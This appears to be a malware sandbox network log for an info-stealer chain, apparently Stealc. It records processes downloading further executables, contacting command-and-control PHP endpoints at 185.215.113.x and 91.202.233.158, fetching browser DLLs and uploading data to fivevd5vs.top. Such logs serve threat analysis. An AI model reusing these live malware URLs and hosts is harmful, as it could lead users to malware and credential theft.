                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:13 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/gold.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/gold.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 320000
                                                                                                                                                Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e1ea94-4e200"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/needmoney.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/needmoney.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:57 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 4278784
                                                                                                                                                Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e2f2f6-414a00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/crypted.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/crypted.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:08 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 321024
                                                                                                                                                Last-Modified: Fri, 13 Sep 2024 21:22:58 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e4ad32-4e600"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.26/Nework.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                GET /Nework.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:41 GMT
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Content-Length: 425984
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
                                                                                                                                                ETag: "68000-620711078a800"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 4
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.26/Dem7kTu/index.php
                                                                                                                                                Hkbsse.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.26:80
                                                                                                                                                Request
                                                                                                                                                POST /Dem7kTu/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.26
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET / HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:43 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 214
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:43 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 180
                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFB
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 268
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:44 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 1520
                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 267
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:44 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 7116
                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 268
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:45 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 108
                                                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 5051
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:45 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:45 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                ETag: "10e436-5e7ec6832a180"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 1106998
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 363
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:46 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:46 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "a7550-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 685392
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:47 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "94750-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 608080
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:47 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "6dde8-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 450024
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/nss3.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/nss3.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:48 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "1f3950-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 2046288
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "3ef50-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 257872
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                ETag: "13bf0-5e7e950876500"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 80880
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 827
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=86
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 267
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 2408
                                                                                                                                                Keep-Alive: timeout=5, max=85
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 265
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=84
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 363
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=83
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=82
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.17/2fb6c2cc8dce150a.php
                                                                                                                                                stealc_default2.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.17:80
                                                                                                                                                Request
                                                                                                                                                POST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA
                                                                                                                                                Host: 185.215.113.17
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-us
                                                                                                                                                GET
                                                                                                                                                http://103.130.147.211/Files/2.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                103.130.147.211:80
                                                                                                                                                Request
                                                                                                                                                GET /Files/2.exe HTTP/1.1
                                                                                                                                                Host: 103.130.147.211
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:44 GMT
                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                Last-Modified: Mon, 16 Sep 2024 00:25:38 GMT
                                                                                                                                                ETag: "65b09f-622319cb8466e"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 6664351
                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                              • flag-tm
                                                                                                                                                GET
                                                                                                                                                http://91.202.233.158/
                                                                                                                                                svchost015.exe
                                                                                                                                                Remote address:
                                                                                                                                                91.202.233.158:80
                                                                                                                                                Request
                                                                                                                                                GET / HTTP/1.1
                                                                                                                                                Host: 91.202.233.158
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-tm
                                                                                                                                                POST
                                                                                                                                                http://91.202.233.158/e96ea2db21fa9a1b.php
                                                                                                                                                svchost015.exe
                                                                                                                                                Remote address:
                                                                                                                                                91.202.233.158:80
                                                                                                                                                Request
                                                                                                                                                POST /e96ea2db21fa9a1b.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBG
                                                                                                                                                Host: 91.202.233.158
                                                                                                                                                Content-Length: 213
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:02 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 8
                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                              • flag-us
                                                                                                                                                DNS
                                                                                                                                                fivevd5vs.top
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                8.8.8.8:53
                                                                                                                                                Request
                                                                                                                                                fivevd5vs.top
                                                                                                                                                IN A
                                                                                                                                                Response
                                                                                                                                                fivevd5vs.top
                                                                                                                                                IN A
                                                                                                                                                188.225.44.114
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
                                                                                                                                                Request
                                                                                                                                                POST /v1/upload.php HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary38542015
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 412
                                                                                                                                                Host: fivevd5vs.top
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:05 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                2.exe
                                                                                                                                                Remote address:
                                                                                                                                                188.225.44.114:80
